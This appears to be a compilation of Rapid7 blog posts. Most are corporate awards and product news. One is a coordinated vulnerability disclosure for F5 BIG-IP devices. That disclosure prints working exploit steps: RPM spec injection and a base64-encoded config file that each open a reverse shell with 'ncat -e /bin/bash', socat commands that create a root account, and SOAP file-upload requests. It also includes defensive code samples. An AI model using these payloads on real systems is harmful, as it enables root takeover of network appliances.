On November 30th, 2022, Rapid7 was again recognized by The Boston Globe as a Top Place to Work in Massachusetts. This marks the 11th consecutive year Rapid7 has made the list, this time coming in at #3 in the large company category. Top Places to Work rankings are based on a Globe survey that measures worker opinions about their company’s direction, management, pay and benefits, culture, engagement, and more.

Christina Luconi, Chief People Officer at Rapid7, is proud that the company has maintained such a consistent place in one of the most prestigious workplace award programs in the region—especially as the company has grown and scaled over more than a decade.

“We started participating when Rapid7 had less than 100 employees. Since then, we’ve scaled the size categories from small, to medium, to large, and still maintained that ‘great place to work’ status,” she said. “Today, we have nearly 2,700 people in offices around the world, with 735 in our Boston headquarters.”

Luconi believes it’s more than office perks that keep people engaged and ensure long-term company success. “The companies that stand the test of time as truly amazing places to work are those that unite employees around a shared mission of customer success,” she said. “From there, these organizations are able to map their business strategy back to an environment where their people are inspired, motivated, and thrive.”

To create an environment that fosters innovation and success, Rapid7’s people development team empowers employees to take ownership of their career trajectory and goals. This includes programs at every stage of the employee lifecycle, from onboarding to management and leadership positions.

“Rapid7’s strong sense of core values, impactful company mission, and alignment between business and people strategy is what makes the company special,” said Luconi.

For more information about working at Rapid7, please visit our careers page.

AWS Graviton Processor Support on Insight Agent

Post Syndicated from Rapid7 original


By Marco Botros

Marco is a Technical Product Manager for Platform at Rapid7.

We are pleased to announce that the Insight Agent now supports the AWS Graviton processor. The Insight Agent supports various operating systems running on the AWS Graviton processor, including Amazon Linux, Red Hat, and Ubuntu. The full list of supported operating systems can be found in our documentation.

AWS first introduced its ARM-based server processor — Graviton — in 2018. It has since released Graviton2 in 2020 and Graviton3 in May of 2022. The Graviton3 processor has 25% better compute performance and uses up to 60% less energy than the Graviton2 processor. Besides supporting Linux on the Graviton processor, we will continue to support it on both 32-bit and 64-bit Intel processors. However, you will only be able to see the new Graviton installer if your organization’s agents are not pinned or, if they have been pinned, are on an agent version higher than 3.2.0. The new Linux installer is called ``, and the Intel-based Linux installer has been renamed to `` (from just ``).

You can find more information on how to download and install the new Linux ARM Installer from the download section of Agent Management in the platform:


You can also use the Agent Test Set feature to roll out the new agent on a select set of machines before deploying it widely.

Search Made Easy: InsightIDR’s Secret Weapon for Efficiency and Efficacy

Post Syndicated from Rapid7 original


By Matt Heidet

Matt is a Senior Information Security Engineer at a Regional Financial Institution. He is a Customer and Guest Blogger for Rapid7.

Have you ever groaned when divvying up incidents from a pen-test amongst an overworked team? Or maybe you’ve struggled to present how you adhere to multiple compliance frameworks to your board. As a Senior Information Security Engineer at a Regional Finance Institute, I’m all too familiar with the daily grind – too many threats, not nearly enough time. Fortunately, Rapid7’s InsightIDR has helped me and my team unify our data, verify the nature of threats, and uphold a security posture that we’re confident in.

InsightIDR has lots of features that have enabled my organization to identify and respond more easily to threats. In this blog post, I’m going to share some insight into my favorite – InsightIDR’s Log Search function.

Back to the Beginning: Why We Chose Rapid7

Choosing InsightIDR was a no-brainer for us. We tried two other products, but as soon as we finished the proof-of-concept with Rapid7, we went straight to purchase. There was no point in even testing the others, as InsightIDR provided us with the visibility and context necessary to keep our environment secure.

If you already have InsightVM, Rapid7’s vulnerability management solution, it’s a pretty smooth transition to InsightIDR. As existing InsightVM users, we already had the Rapid7 Insight Agent deployed on our endpoints, which provided us with real-time endpoint monitoring for vulnerabilities. When we added InsightIDR to our environment, we were automatically covered on those same endpoints, without any need to set up anything additional.

We were able to get up and running and integrate with a number of Azure Event Hubs (a centralized service for collecting Azure data and logs) out of the gate. Only a few other tools would provide that same capability – but they wouldn’t fit into our existing environment the way that Rapid7 did.

When we first started using InsightIDR, my team wanted to bring in as much data to InsightIDR as we could to get a clear picture of what was happening in our environment. We knew we needed holistic visibility, but weren’t 100% sure what we should be alerting on or necessarily looking for. Luckily, InsightIDR’s Log Search intuitively organized all of our data and helped us get a view of everything in one place, narrowing our focus and enabling us to really focus on high-priority data.

InsightIDR removed the complexity of traditional Log Search. If you’re not sure where to start, just start with a simple search – a host name, a kind of attack, or an event. Then, based on your results, you can create a more advanced search by filtering, iterating, or narrowing down your simple searches. From there, you can start creating reports. Your reports can tell you (and you can then customize) how you should be watching an endpoint, how you should be alerted, and more.

Let’s Talk Outcomes

Now it’s time to do something with all this data! We were able to compare data from those sources to the email alerts that we got from Microsoft on Azure and easily generate a report based on the email events we were seeing from Microsoft. From there, we were able to generate custom detections.

One reason this was all so straightforward is that Rapid7’s powerful search language, Log Entry Query Language (LEQL – which allows you to construct queries that can extract the hidden insights within your logs), is easy to pick up. Even if you’re not a programmer or engineer, the structure and syntax of the language are accessible.

Once you get the first couple workflows ironed out, it’s easy to extrapolate to other ones. Once my team focused on this task we were able to come up with 45 custom detections over just three days!

Where Do I Go From Here?

Detections are your bread and butter, of course. But once you’re oriented to the dashboard, the language, and the basics of a workflow, the sky’s the limit. You can then customize your reports to your heart’s desire. My team currently has about 22 reports coming in daily, summarizing almost 100 custom detections that all stem from log search.

Rapid7’s alerting and reporting is hands down the best I’ve ever worked with. But it’s not just about volume – it’s also about versatility. We’re able to monitor all of our Cloud services – including Amazon, Azure, and Google – with ease. In the past, when using managed security providers, this wasn’t nearly as straightforward. We’re looking at InsightIDR’s pre-built Attacker Behavior Analytics (ABA) and User Behavior Analytics (UBA) detections with regularity, using a mix of both custom and pre-built “cards” (a visually appealing representation of data) in our InsightIDR dashboard.

Furthermore, it’s not just that you have options. The pre-built detections that InsightIDR ships out of the box boast plenty of efficacy, resulting in unprecedented efficiency. The ability to have all of the data you need in one place – the equivalent of a “single pane of glass” – just can’t be overstated.

Rapid7 Takes Home 2 Awards and a Highly Commended Recognition at the 2022 Belfast Telegraph IT Awards

Post Syndicated from Rapid7 original


Rapid7 was honored at the Belfast Telegraph’s annual IT Awards, Friday, taking home a pair of awards including the coveted “Best Place to Work in IT” in the large company category award, and the “Cyber Security Project of the Year” award, for groundbreaking machine learning research in application security. That research was conducted in collaboration with The Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast.

The team also took home a Highly Commended recognition for Best Use of Cloud services at the event.


The ability to work on meaningful projects that positively impact customers, being supported by a range of professional development opportunities, a culture rooted in connection and collaboration, and the invitation to explore new ways of thinking all came together in the submission to help earn them the “Best Place to Work” title.

Belfast has been regarded as one of the UK’s fastest growing technology hubs. There are now more than 300,000 people working in the technology sector of Northern Ireland, according to the Telegraph. For Rapid7, an impressive business environment and the work being done in IT Security at the local universities were significant factors in the decision to join the Belfast community in 2014. This move was in line with Rapid7’s goal of creating exceptional career experiences for their people and expanding operations to address a growing global customer base. In 2021, Rapid7 relocated to their newest office space and announced the addition of more than 200 new roles to the region.

Rapid7’s win for Cybersecurity Project of the Year focused on the cutting-edge area of machine learning in application security. Their research sought to reduce the high level of false positives generated by vulnerability scanners — a pain point that has become all too common in today’s digital environment. Rapid7’s multi-disciplinary Machine Learning (ML) team in Belfast was able to create a way to automatically prioritize real vulnerabilities and reduce false positive friction for customers. Their work has been peer-reviewed by industry experts, published in academic journals, and accepted for presentation at AISEC’s November 2022 event — where it was recognized with their “Best Paper Award.” AISEC is the leading venue for ML cybersecurity innovations.


Rounding out the evening was a Highly Commended recognition from the Telegraph for “Best Use of Cloud Services.” The scale and speed of cloud adoption over the last number of years has caused an exponential growth in complex security challenges. Rapid7 showcased how their team in Belfast partnered with global colleagues to create an innovative and multi-faceted solution to manage Cloud Identity Risk across three major Cloud Service Providers (CSPs) — AWS, Azure and GCP. Their work has created a positive impact on Rapid7 customers by enabling secure cloud adoption faster than ever before.

Rapid7 is a company that is firmly rooted in their company values. Employees are encouraged to challenge conventional ways of thinking, work together to create impact, be advocates for customers, bring their authentic selves and experiences to the table, and embrace the spirit of continuous learning and growth. The work represented in these awards is a testament to the incredible opportunities and experiences that are possible when these values are clearly modeled, celebrated and practiced in pursuit of a shared mission — creating a safer digital future for all.

For more information about working at Rapid7, check out

For more information on the Belfast Telegraph IT Awards and other winners, click here.

CVE-2022-41622 and CVE-2022-41800 (FIXED): F5 BIG-IP and iControl REST Vulnerabilities and Exposures

Post Syndicated from Rapid7 original


Rapid7 discovered several vulnerabilities and exposures in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS detailed in F5’s Base Operating Systems support article. The affected products are detailed in the vendor advisories below:

  • CVE-2022-41622: BIG-IP and BIG-IQ are vulnerable to unauthenticated remote code execution via cross-site request forgery (CSRF)
  • CVE-2022-41800: Appliance mode iControl REST is vulnerable to authenticated remote code execution via RPM spec injection

Rapid7 also discovered several bypasses of security controls that F5 does not consider vulnerabilities with a reasonable attack surface (K05403841):

  • ID1145045 – Local privilege escalation via bad UNIX socket permissions (CWE-269)
  • ID1144093 – SELinux bypass via incorrect file context (CWE-732)
  • ID1144057 – SELinux bypass via command injection in an update script (CWE-78)

Note: the presence of SELinux hardening on F5 devices is an excellent safeguard that made our exploitation attempts more difficult.

Rapid7 initially reported these vulnerabilities to F5 on August 18, 2022. Since then, members of our research team have worked with the vendor to discuss impact, resolution, and a coordinated response.

Product description

Several F5 products, namely in the BIG-IP family of traffic-shaping devices, are affected by the vulnerabilities. These devices and applications are typically exposed to the internet for normal functionality, but the management ports where these vulnerabilities occur are typically internal-facing.

For more information on the affected products, see the vendor’s advisory, and the vendor’s product website.


We believe that widespread exploitation of the issues in this disclosure is unlikely. That being said, by successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device’s management interface (even if the management interface is not internet-facing). However, that would require a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network).

Most of the remaining vulnerabilities are relatively minor, and require the attacker to already have some level of access to the target device. They are more likely to be leveraged as part of an exploit chain to exacerbate more serious vulnerabilities.

At time of publishing, F5 was not aware of any exploitation of these vulnerabilities.


These vulnerabilities were discovered and documented by Ron Bowes, Lead Security Researcher at Rapid7. They are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vendor statement

F5 is committed to security, and we collaborate with valued researchers, such as Rapid7, to respond to and resolve vulnerabilities on behalf of our customers.


CVE-2022-41622 – Unauthenticated Remote Code Execution in SOAP API via CSRF

F5 Big-IP’s SOAP API (the endpoint /iControl/iControlPortal.cgi) does not have cross-site request forgery (CSRF) protection, nor does it require a correct Content-Type or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user’s session. That could lead to remote code execution in several different ways, which we demonstrated in a proof of concept.

Note: several of the exploit paths require SELinux bypasses, which we have detailed below.

The API endpoint for SOAP requests, iControlPortal.cgi, which is accessible at /iControl/iControlPortal.cgi, is a CGI script that is SetUID root — that is, it executes as root:

ls -l /usr/local/www/iControl/iControlPortal.cgi
-rwsr-xr-x. 1 root root 2931172 Jul 15 01:13 /usr/local/www/iControl/iControlPortal.cgi

The script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the upload_file and create_user_3 endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely. We didn’t find a way to immediately run code on the target host, but our investigation did not include every possible API endpoint.

The PoC file has full details on the payloads we tested and how to use them to execute arbitrary code at reboot or login.
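The two missing protections named above can be enforced before the SOAP body is even parsed. The following is an added example, not F5’s code: a gate function that refuses form-submittable content types, requires a SOAPAction header (a custom header a browser cannot attach to a cross-origin request without a CORS preflight), and checks Origin and Sec-Fetch-Site against the management UI’s own origin. The allowed origin and the sample request headers are constructed.

```python
"""Request-level CSRF gate for a SOAP endpoint.

Added example; this is not F5's code.  It implements the two defences the
post says iControlPortal.cgi lacks: a required, non-form Content-Type plus
a SOAPAction header, and an Origin / Sec-Fetch-Site check.  The allowed
origin and the header values in the samples are constructed.
"""
from __future__ import annotations

# Content types an HTML form (or a "simple" cross-origin fetch) can send
# without a CORS preflight.  Accepting any of these for a state-changing
# SOAP call is what lets a hostile page replay the authenticated session.
FORM_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}
# Content types a SOAP 1.1 / 1.2 client legitimately sends.  A browser can
# only send these cross-origin after a preflight, which a server that emits
# no Access-Control-Allow-* headers will fail.
SOAP_TYPES = {"text/xml", "application/soap+xml"}


def media_type(header_value: str | None) -> str:
    """'text/xml; charset=utf-8' -> 'text/xml'."""
    return (header_value or "").split(";", 1)[0].strip().lower()


def csrf_check(headers: dict[str, str], allowed_origins: frozenset[str]) -> tuple[bool, str]:
    """Decide before parsing the body.  Returns (accept, reason).

    Header names are matched case-insensitively.  A request with no Origin
    and no Sec-Fetch-Site header (curl, an SDK) is accepted on the
    content-type rules alone: CSRF is a browser problem, and the endpoint's
    own authentication still applies afterwards.
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = media_type(h.get("content-type"))
    if ctype in FORM_TYPES or not ctype:
        return False, f"form-submittable content type {ctype or '(none)'!r}"
    if ctype not in SOAP_TYPES:
        return False, f"unexpected content type {ctype!r}"
    if "soapaction" not in h:
        return False, "missing SOAPAction header"
    site = h.get("sec-fetch-site")
    if site is not None and site not in {"same-origin", "none"}:
        return False, f"Sec-Fetch-Site is {site!r}"
    origin = h.get("origin")
    if origin is not None and origin not in allowed_origins:
        return False, f"origin {origin!r} is not the management UI"
    return True, "accepted"


ALLOWED = frozenset({"https://bigip.example"})  # constructed management-UI origin

# Constructed sample requests.
FORGED_FORM = {             # auto-submitted <form> on a hostile page
    "Content-Type": "text/plain",
    "Origin": "https://attacker.example",
    "Sec-Fetch-Site": "cross-site",
}
FORGED_FETCH = {            # cross-origin fetch() that got past a permissive preflight
    "Content-Type": "text/xml",
    "SOAPAction": "urn:iControl:System/ConfigSync",
    "Origin": "https://attacker.example",
    "Sec-Fetch-Site": "cross-site",
}
LEGIT_BROWSER = {           # the management UI's own XHR
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "urn:iControl:System/ConfigSync",
    "Origin": "https://bigip.example",
    "Sec-Fetch-Site": "same-origin",
}
LEGIT_CLI = {"Content-Type": "text/xml", "SOAPAction": "urn:iControl:System/ConfigSync"}
```

The content-type rule does most of the work on its own: an HTML form cannot send text/xml, and a script that tries to gets stopped by the browser’s preflight unless the server opts in with CORS headers. The Sec-Fetch-Site and Origin checks are the belt to that suspender, for the case where a permissive CORS policy or a non-conforming client lets a cross-site request through.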

CVE-2022-41800 – Authenticated Remote Code Execution via RPM Spec Injection

F5 Big-IP’s JSON API includes an administrator-only endpoint that creates an RPM specification file (.rpmspec). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created. This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc.) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.

Although F5 considered this noteworthy enough to assign CVE-2022-41800, we consider the risk of this vulnerability to be low. While the result is surprising, the exploit requires an administrator login, and other endpoints (such as /mgmt/tm/util/bash) are capable of executing shell commands by design. That said, this technique can bypass blocklists or alerts that an administrator might set up for the well-known bash endpoint.

To demonstrate the vulnerability, we developed this JSON payload:

{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 4444",
    "summary": "test9"
  }
}

Note the newlines and %check in the description field, which according to the documentation is typically used to run tests. We sent that JSON as part of an authenticated request to /rpm-spec-creator:

$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}

The server responds with a specFilePath containing the spec we created. Here’s what the file looks like on the file system:

$ ssh [email protected] cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial
Packager: F5 Networks <[email protected]>


%check
ncat -e /bin/bash 4444


We start our listener on the host/port specified in the ncat command:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( )
Ncat: Listening on :::4444
Ncat: Listening on

And build the RPM with /build-package (using jq to format the output):

$ curl -X POST -sku admin:Password1 --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq
{
  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
  "generation": 1,
  "lastUpdateMicros": 1666214391730921,
  "kind": "shared:iapp:build-package:buildrpmtaskstate",
  "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"
}

Then, we verify that we get a root shell on our listener:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
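The defect behind CVE-2022-41800 is a template-construction problem: field values reach the spec file with their newlines intact, so a value can open a new %-section. As an added example (not F5’s code; the field names follow the JSON above, while the spec layout and the validation rules are assumptions), here is the vulnerable builder beside a hardened one that validates each field before rendering, plus a helper that lists the %-sections a spec on disk actually contains:

```python
"""Building an RPM .spec from API-supplied fields.

Added example, not F5's code.  build_spec_unchecked() shows the failure
class behind CVE-2022-41800: each field is written into the spec verbatim,
so a value containing a newline and a %-section becomes a script the
build runs.  build_spec() is the hardened form: every field must be a
single line with no '%' and, for the tag-like fields, a narrow charset.
Field names match the JSON in the post; the spec layout is an assumption.
"""
import re

REQUIRED = ("name", "srcBasePath", "version", "release", "description", "summary")
# Conservative shape for Name/Version/Release: no whitespace, no '%', no '/'.
TAG_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}")
# Free text: printable, single line, and no '%' so no macro or section can start.
TEXT_RE = re.compile(r"[^\x00-\x1f\x7f%]{1,1024}")


class SpecInjection(ValueError):
    """A field value would change the structure of the generated spec."""


def _render(f):
    # Layout assumed for the example; srcBasePath is validated because the
    # caller controls it, even though this minimal template does not emit it.
    return (
        f"Summary: {f['summary']}\n"
        f"Name: {f['name']}\n"
        f"Version: {f['version']}\n"
        f"Release: {f['release']}\n"
        "BuildArch: noarch\n"
        "Group: Development/Libraries\n"
        "License: Commercial\n"
        "\n"
        "%description\n"
        f"{f['description']}\n"
    )


def build_spec_unchecked(fields):
    """The vulnerable shape: trust the caller, interpolate directly."""
    return _render(fields)


def build_spec(fields):
    """The hardened shape: validate every field before it touches the spec."""
    for key in REQUIRED:
        value = fields.get(key)
        if not isinstance(value, str):
            raise SpecInjection(f"{key}: missing or not a string")
        pattern = TAG_RE if key in ("name", "version", "release") else TEXT_RE
        if not pattern.fullmatch(value):
            raise SpecInjection(f"{key}: rejected {value!r}")
    return _render(fields)


def rejects(fields):
    """True if the hardened builder refuses these fields."""
    try:
        build_spec(fields)
    except SpecInjection:
        return True
    return False


def spec_sections(spec):
    """Names of the %-sections present, in order; handy for auditing a spec on disk."""
    return re.findall(r"^%(\w+)", spec, flags=re.M)


# Constructed inputs: the injected one mirrors the post's payload with a
# harmless command in place of the reverse shell.
INJECTED = {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7",
            "description": "test8\n\n%check\necho injected", "summary": "test9"}
CLEAN = {"name": "test", "srcBasePath": "/tmp", "version": "1.0", "release": "1",
         "description": "A harmless package.", "summary": "test"}
```

spec_sections() is the audit-side counterpart: run over the .spec files under the path the API reports (the specFilePath directory in the response above), any section other than %description in an API-generated spec is worth a look.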


ID1145045 – Local Privilege Escalation via UNIX Socket Permissions

F5 uses a proprietary database called mcp, which is used for persistent storage on Big-IP (and related) devices. The database is owned by root and accessed via a UNIX domain socket with 0777 permissions (accessible by all local users) and no authentication:

# ls -l /var/run/mcp 
srwxrwxrwx. 1 root root 0 Oct 19 14:12 /var/run/mcp

We can connect to it and perform queries using socat, which is (helpfully) installed by default.

As part of our research, we fully documented the protocol, including writing a tool that can parse queries, create arbitrary queries, and remotely eavesdrop on traffic via an authenticated SSH connection. While the list of supported object types is extensive, we targeted the user-management code since our goal was security bypasses.

We developed a script called mcp-privesc.rb, which is also included in that repository. Its output, when sent to the socket, creates a root-level account; the repository also includes a pre-built escalationplz.bin payload that creates a rontest / Password1 account when sent to the socket.

Here’s how we used the tool to create a message. Note: the message was gzipped for size reasons, then base64-encoded so we could copy/paste more easily. Output is truncated for the blog, but the full text is included in the file in the repository:

$ ruby ./mcp-privesc.rb blogtest MyFunPW | gzip | base64 -w0
Attempting to create a crypt-sha512 hash of the password
Writing an `mcp` message to stdout that'll create an account: blogtest / $6$vdznqfyc$q9L[...]1
Send it to the target using: socat -t100 - UNIX-CONNECT:/var/run/mcp < mcpmessage.bin


Then, from a non-root account, we send the message to the socket and verify the account exists:

$ whoami

$ echo -ne 'H4s[...]A==' | base64 -d | gunzip - | socat -t100 - UNIX-CONNECT:/var/run/mcp | gzip | base64 -w0

bash-4.2$ su blogtest

[[email protected]:NO LICENSE:Standalone] config # whoami

F5 claims this is not a vulnerability, because, by design, all users that log in are already root (and it’s true that the overwhelming majority of Big-IP’s attack surface already runs as root). However, several network services—including Apache, Tomcat, and Bind—listen on network ports and link to custom modules written in C/C++. If a vulnerability is discovered in any of those non-root services, a privilege escalation exploit path directly to root removes the small amount of privilege separation that exists.

ID1144093 – SELinux Bypass via Incorrect File Context

After finding an arbitrary file write SOAP endpoint, we found that SELinux limited our ability to actually exploit the issue. Despite the SOAP endpoint (iControlPortal.cgi) being set-UID root, and therefore executing as a privileged process, it could not create or overwrite sensitive files due to being part of a restricted SELinux context. That means that we couldn’t use obvious attack paths like adding a script to /etc/profile.d or replacing /var/ssh/root/authorized_keys.

We did, however, find exactly one file in /etc/profile.d that was writable from the SOAP process due to it being a symbolic link to another location:

# ls -l /etc/profile.d/
lrwxrwxrwx. 1 root root 31 Jul 15 02:48 /etc/profile.d/ -> ../../var/run/config/

# ls -l /var/run/config/ 
-r--r--r--. 1 root root 303 Oct 19 15:40 /var/run/config/

If we replace /var/run/config/ with our own script via the SOAP interface, which we can (despite the file itself not having write permission), it will execute next time a user logs in via SSH and /etc/profile.d scripts execute. We use that file as a target in our SOAP exploit proof of concept:

<soapenv:Envelope xmlns:xsi="" xmlns:xsd="" xmlns:soapenv="" xmlns:con="urn:iControl:System/ConfigSync">
      <con:upload_file soapenv:encodingStyle="">
        <file_name xsi:type="xsd:string">/var/run/config/</file_name>
         <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
            <!--type: Common.OctetSequence-->
            <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>

F5 argues that this is not a vulnerability, because it requires a different vulnerability to exist before it can be leveraged (as we demonstrated with CVE-2022-41622 above). As a result, it was not assigned a CVE. However, Rapid7 considers this a vulnerability because it bypasses a security boundary — namely, SELinux. Without these SELinux bypasses, turning an arbitrary file write into code execution would be difficult, since most files an attacker would typically create or replace to exploit a file-write vulnerability (such as adding a script to /etc/profile.d) are blocked.
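Both of these findings (the world-connectable mcp socket in ID1145045 and the profile.d symlink into /var/run in ID1144093) can be looked for on any Linux host. The audit below is an added example, not Rapid7 tooling or F5’s code: one function lists UNIX domain sockets that are writable by "other", the other lists profile.d entries that are symlinks resolving outside a trusted tree. demo() runs both over a constructed temporary directory laid out like the listings above; to audit a real host, point them at /var/run and at /etc/profile.d with /etc as the trusted root.

```python
"""Host-audit checks for ID1145045 and ID1144093.

Added example, not Rapid7 tooling.  world_writable_sockets() finds UNIX
domain sockets that any local user can connect to, which is what makes an
unauthenticated root-owned service like mcp reachable from a low-privilege
process.  escaped_profile_links() finds entries in a profile.d directory
that are symlinks resolving outside the trusted tree, the pattern that let
a SELinux-confined process reach a login script through /var/run.  The
fixture built by build_sample_tree() is a constructed temp tree, not a BIG-IP.
"""
import os
import socket
import stat
import tempfile
from pathlib import Path


def world_writable_sockets(root):
    """Paths of sockets under root whose mode grants write (i.e. connect) to 'other'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISSOCK(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def escaped_profile_links(profile_d, trusted_root):
    """(link, resolved target) pairs for symlinks in profile_d that leave trusted_root."""
    trusted = Path(trusted_root).resolve()
    out = []
    for entry in sorted(Path(profile_d).iterdir()):
        if not entry.is_symlink():
            continue
        target = entry.resolve()
        if target != trusted and trusted not in target.parents:
            out.append((str(entry), str(target)))
    return out


def build_sample_tree(base):
    """Constructed fixture mirroring the post's listings: etc/profile.d with one
    escaping symlink, one in-tree symlink, one plain file; var/run with a
    0777 socket named mcp and a 0600 socket for contrast."""
    base = Path(base)
    etc, run = base / "etc", base / "var" / "run"
    profile_d, cfg = etc / "profile.d", run / "config"
    profile_d.mkdir(parents=True)
    cfg.mkdir(parents=True)
    (cfg / "late.sh").write_text("# lives outside /etc\n")
    (profile_d / "late.sh").symlink_to(Path("..") / ".." / "var" / "run" / "config" / "late.sh")
    (etc / "colors.sh").write_text("# lives inside /etc\n")
    (profile_d / "colors.sh").symlink_to(Path("..") / "colors.sh")
    (profile_d / "plain.sh").write_text("# regular file\n")
    for name, mode in (("mcp", 0o777), ("private", 0o600)):
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(str(run / name))
        s.close()
        os.chmod(run / name, mode)
    return etc, profile_d, run


def demo():
    """Run both checks over the fixture; returns (socket names, escaping link names)."""
    with tempfile.TemporaryDirectory() as tmp:
        etc, profile_d, run = build_sample_tree(tmp)
        socks = world_writable_sockets(run)
        links = escaped_profile_links(profile_d, etc)
        return ([os.path.basename(p) for p in socks],
                [os.path.basename(link) for link, _target in links])


if __name__ == "__main__":
    print(demo())
```

Neither check replaces SELinux reasoning: a symlink out of /etc is only a problem when the target’s file context is one a confined process may write, and a 0777 socket is only a problem when the service behind it does no authentication. They are cheap first-pass filters that surface exactly the two conditions the post describes.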

ID1144057 – SELinux bypass via Command Injection in Startup Script

The script /bin/f5_update_checker, which is executed at boot, is vulnerable to command injection in its configuration file (/shared/f5_update_action). Several strings in the file are passed directly into shell commands, where arbitrary bash commands can be injected using backticks, semicolons, or any other typical CWE-78 technique.

This one is interesting, because we found it quite early in our research but didn’t recognize its significance until much later. During our initial analysis, f5_update_checker caught our eye because it runs at boot, performs some sort of nebulous update check (ironically, update mechanisms are a common source of security vulnerabilities), and is a 32-bit ELF binary written in C++. Additionally, running strings showed that it uses curl insecurely, with -k:

# strings $(which f5_update_checker)
curl -g -k -m 30 -s -f -o /dev/null 

When f5_update_checker starts, it loads and parses a configuration file called /shared/f5_update_action, which doesn’t exist by default. In fact, as far as we can tell, absolutely nothing else on the entire operating system is aware of /shared/f5_update_action! Out of curiosity, we reverse engineered the file format from the binary, since the process won’t start without a valid (enough) file, and found it’s line-based and looks something like:


The URLs are passed directly into curl with no escaping (not even quotes, in fact), so we can add in arbitrary commands however we like:

http://localhost:1234/success`touch /tmp/testshellinjection`

At the next reboot, f5_update_checker will execute, load the configuration file, pause for two minutes (by design), then execute the command.

At that point, we shelved this as not interesting with the note:

f5_update_checker consumes a file /shared/f5_update_action and grabs a URL from it. That leads to a bunch of problems – shell injection, SSRF, etc. But nothing seems to use any of this, so I guess it’s all a dud

Much later, we found the SOAP bypass discussed above, but lamented that while we could upload a file to anywhere on the filesystem as root, we couldn’t overwrite anything of value due to SELinux policies! After thinking for way too long, we remembered the seemingly innocuous vulnerability that we’d found a month earlier, recalled that it references a non-extant file, and tested it with SOAP. Sure enough, it worked!

Here is an example of a SOAP request that will plant a malicious /shared/f5_update_action file:

<soapenv:Envelope xmlns:xsi="" xmlns:xsd="" xmlns:soapenv="" xmlns:con="urn:iControl:System/ConfigSync">
      <con:upload_file soapenv:encodingStyle="">
        <file_name xsi:type="xsd:string">/shared/f5_update_action</file_name>
         <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
            <!--type: Common.OctetSequence-->
            <file_data xsi:type="urn:Common.OctetSequence">QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==</file_data>
            <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>

This is an interesting case in which a low-risk vulnerability can actually be meaningfully leveraged, in the right context. Specifically, we found a way to bypass SELinux and create some sneaky persistence.

